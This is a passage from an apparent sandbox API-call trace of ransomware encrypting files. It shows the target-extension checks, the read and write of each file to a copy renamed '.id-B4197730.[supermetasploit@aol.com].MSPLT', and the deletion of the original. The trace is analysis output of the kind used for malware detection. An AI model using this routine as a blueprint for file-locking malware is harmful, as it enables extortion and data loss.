(lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.531] lstrlenW (lpString=".doc") returned 4 [0170.531] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0170.531] lstrlenW (lpString=".docx") returned 5 [0170.531] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0170.531] lstrlenW (lpString=".pdf") returned 4 [0170.531] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0170.531] lstrlenW (lpString=".xls") returned 4 [0170.531] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0170.531] lstrlenW (lpString=".xlsx") returned 5 [0170.531] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0170.531] lstrlenW (lpString=".ppt") returned 4 [0170.531] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0170.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.531] lstrlenW (lpString=".zip") returned 4 [0170.531] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0170.531] lstrlenW (lpString=".rar") returned 4 [0170.532] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0170.532] lstrlenW (lpString=".bz2") returned 4 [0170.532] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0170.532] lstrlenW (lpString=".7z") returned 3 [0170.532] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0170.532] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.532] lstrlenW (lpString=".dbf") returned 4 [0170.532] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0170.532] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.532] lstrlenW (lpString=".1cd") returned 4 [0170.532] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0170.532] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.532] lstrlenW (lpString=".jpg") returned 4 [0170.532] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0170.532] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0170.532] lstrlenW (lpString="LocalizedData.xml") returned 17 [0170.532] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0170.532] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=80060) returned 1 [0170.532] CloseHandle (hObject=0x30c) returned 1 [0170.533] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml")) returned 0x80 [0170.533] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.533] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0170.533] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0170.533] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0170.533] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0170.533] GetLastError () returned 0x0 [0170.533] ReadFile (in: hFile=0x30c, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x138bc, lpOverlapped=0x0) returned 1 [0170.779] WriteFile (in: hFile=0x2f8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x138c0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x138c0, lpOverlapped=0x0) returned 1 [0170.782] ReadFile (in: hFile=0x30c, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0170.782] WriteFile (in: hFile=0x2f8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xf6, lpOverlapped=0x0) returned 1 [0170.783] SetEndOfFile (hFile=0x2f8) returned 1 [0170.783] CloseHandle (hObject=0x2f8) returned 1 [0170.788] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0170.788] SetEndOfFile (hFile=0x30c) returned 1 [0170.790] CloseHandle (hObject=0x30c) returned 1 [0170.790] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0170.790] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml")) returned 1 [0170.791] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.791] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.791] lstrlenW (lpString=".doc") returned 4 [0170.791] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0170.791] lstrlenW (lpString=".docx") returned 5 [0170.791] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0170.791] lstrlenW (lpString=".pdf") returned 4 [0170.791] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0170.791] lstrlenW (lpString=".xls") returned 4 [0170.791] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0170.791] lstrlenW (lpString=".xlsx") returned 5 [0170.791] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0170.791] lstrlenW (lpString=".ppt") returned 4 [0170.791] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0170.791] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.791] lstrlenW (lpString=".zip") returned 4 [0170.791] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0170.792] lstrlenW (lpString=".rar") returned 4 [0170.792] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0170.792] lstrlenW (lpString=".bz2") returned 4 [0170.792] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0170.792] lstrlenW (lpString=".7z") returned 3 [0170.792] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0170.792] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.792] lstrlenW (lpString=".dbf") returned 4 [0170.792] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0170.792] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.792] lstrlenW (lpString=".1cd") returned 4 [0170.792] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0170.792] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.792] lstrlenW (lpString=".jpg") returned 4 [0170.792] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0170.792] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.792] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.792] lstrlenW (lpString=".doc") returned 4 [0170.792] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0170.792] lstrlenW (lpString=".docx") returned 5 [0170.792] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0170.792] lstrlenW (lpString=".pdf") returned 4 [0170.792] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0170.792] lstrlenW (lpString=".xls") returned 4 [0170.792] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0170.792] lstrlenW (lpString=".xlsx") returned 5 [0170.793] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0170.793] lstrlenW (lpString=".ppt") returned 4 [0170.793] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0170.793] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.793] lstrlenW (lpString=".zip") returned 4 [0170.793] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0170.793] lstrlenW (lpString=".rar") returned 4 [0170.793] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0170.793] lstrlenW (lpString=".bz2") returned 4 [0170.793] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0170.793] lstrlenW (lpString=".7z") returned 3 [0170.793] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0170.793] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.793] lstrlenW (lpString=".dbf") returned 4 [0170.793] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0170.793] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.793] lstrlenW (lpString=".1cd") returned 4 [0170.793] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0170.793] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 44 [0170.793] lstrlenW (lpString=".jpg") returned 4 [0170.793] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0170.793] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0170.793] lstrlenW (lpString="eula.rtf") returned 8 [0170.794] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0170.794] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=12687) returned 1 [0170.794] CloseHandle (hObject=0x30c) returned 1 [0170.794] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf")) returned 0x80 [0170.794] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.794] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0170.794] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0170.794] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0170.794] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0171.103] GetLastError () returned 0x0 [0171.103] ReadFile (in: hFile=0x30c, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x318f, lpOverlapped=0x0) returned 1 [0171.163] WriteFile (in: hFile=0x344, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x3190, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x3190, lpOverlapped=0x0) returned 1 [0171.165] ReadFile (in: hFile=0x30c, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0171.165] WriteFile (in: hFile=0x344, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe4, lpOverlapped=0x0) returned 1 [0171.165] SetEndOfFile (hFile=0x344) returned 1 [0171.165] CloseHandle (hObject=0x344) returned 1 [0171.166] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.166] SetEndOfFile (hFile=0x30c) returned 1 [0171.167] CloseHandle (hObject=0x30c) returned 1 [0171.167] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.168] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf")) returned 1 [0171.168] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.168] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.168] lstrlenW (lpString=".doc") returned 4 [0171.168] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.168] lstrlenW (lpString=".docx") returned 5 [0171.168] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.168] lstrlenW (lpString=".pdf") returned 4 [0171.168] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.168] lstrlenW (lpString=".xls") returned 4 [0171.168] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.168] lstrlenW (lpString=".xlsx") returned 5 [0171.168] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.168] lstrlenW (lpString=".ppt") returned 4 [0171.168] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.168] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.168] lstrlenW (lpString=".zip") returned 4 [0171.169] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.169] lstrlenW (lpString=".rar") returned 4 [0171.169] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.169] lstrlenW (lpString=".bz2") returned 4 [0171.169] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.169] lstrlenW (lpString=".7z") returned 3 [0171.169] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.169] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.169] lstrlenW (lpString=".dbf") returned 4 [0171.169] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.169] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.169] lstrlenW (lpString=".1cd") returned 4 [0171.169] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.169] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.169] lstrlenW (lpString=".jpg") returned 4 [0171.169] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.169] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.169] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.169] lstrlenW (lpString=".doc") returned 4 [0171.169] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.169] lstrlenW (lpString=".docx") returned 5 [0171.169] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.169] lstrlenW (lpString=".pdf") returned 4 [0171.169] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.169] lstrlenW (lpString=".xls") returned 4 [0171.169] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.169] lstrlenW (lpString=".xlsx") returned 5 [0171.169] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.169] lstrlenW (lpString=".ppt") returned 4 [0171.169] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.169] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.169] lstrlenW (lpString=".zip") returned 4 [0171.170] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.170] lstrlenW (lpString=".rar") returned 4 [0171.170] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.170] lstrlenW (lpString=".bz2") returned 4 [0171.170] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.170] lstrlenW (lpString=".7z") returned 3 [0171.170] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.170] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.170] lstrlenW (lpString=".dbf") returned 4 [0171.170] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.170] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.170] lstrlenW (lpString=".1cd") returned 4 [0171.170] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.170] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0171.170] lstrlenW (lpString=".jpg") returned 4 [0171.170] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.170] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0171.170] lstrlenW (lpString="eula.rtf") returned 8 [0171.170] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0171.170] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=3046) returned 1 [0171.170] CloseHandle (hObject=0x30c) returned 1 [0171.170] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf")) returned 0x80 [0171.171] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.171] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0171.171] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.171] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.171] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0171.312] GetLastError () returned 0x0 [0171.312] ReadFile (in: hFile=0x30c, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xbe6, lpOverlapped=0x0) returned 1 [0171.316] WriteFile (in: hFile=0x35c, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xbf0, lpOverlapped=0x0) returned 1 [0171.318] ReadFile (in: hFile=0x30c, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0171.318] WriteFile (in: hFile=0x35c, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe4, lpOverlapped=0x0) returned 1 [0171.318] SetEndOfFile (hFile=0x35c) returned 1 [0171.318] CloseHandle (hObject=0x35c) returned 1 [0171.322] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0171.322] SetEndOfFile (hFile=0x30c) returned 1 [0171.323] CloseHandle (hObject=0x30c) returned 1 [0171.323] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.323] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf")) returned 1 [0171.323] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.323] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.323] lstrlenW (lpString=".doc") returned 4 [0171.323] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.323] lstrlenW (lpString=".docx") returned 5 [0171.323] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.323] lstrlenW (lpString=".pdf") returned 4 [0171.323] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.323] lstrlenW (lpString=".xls") returned 4 [0171.323] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.324] lstrlenW (lpString=".xlsx") returned 5 [0171.324] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.324] lstrlenW (lpString=".ppt") returned 4 [0171.324] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.324] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.324] lstrlenW (lpString=".zip") returned 4 [0171.324] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.324] lstrlenW (lpString=".rar") returned 4 [0171.324] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.324] lstrlenW (lpString=".bz2") returned 4 [0171.324] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.324] lstrlenW (lpString=".7z") returned 3 [0171.324] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.324] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.324] lstrlenW (lpString=".dbf") returned 4 [0171.324] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.324] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.324] lstrlenW (lpString=".1cd") returned 4 [0171.324] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.324] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.324] lstrlenW (lpString=".jpg") returned 4 [0171.324] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.324] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.324] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.324] lstrlenW (lpString=".doc") returned 4 [0171.324] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.324] lstrlenW (lpString=".docx") returned 5 [0171.324] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.324] lstrlenW (lpString=".pdf") returned 4 [0171.324] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.324] lstrlenW (lpString=".xls") returned 4 [0171.325] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.325] lstrlenW (lpString=".xlsx") returned 5 [0171.325] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.325] lstrlenW (lpString=".ppt") returned 4 [0171.325] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.325] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.325] lstrlenW (lpString=".zip") returned 4 [0171.325] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.325] lstrlenW (lpString=".rar") returned 4 [0171.325] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.325] lstrlenW (lpString=".bz2") returned 4 [0171.325] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.325] lstrlenW (lpString=".7z") returned 3 [0171.325] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.325] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.325] lstrlenW (lpString=".dbf") returned 4 [0171.325] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.325] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.325] lstrlenW (lpString=".1cd") returned 4 [0171.325] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.325] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0171.325] lstrlenW (lpString=".jpg") returned 4 [0171.325] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.436] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0171.436] lstrlenW (lpString="eula.rtf") returned 8 [0171.437] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0171.437] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=3683) returned 1 [0171.437] CloseHandle (hObject=0x2d4) returned 1 [0171.437] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf")) returned 0x80 [0171.437] 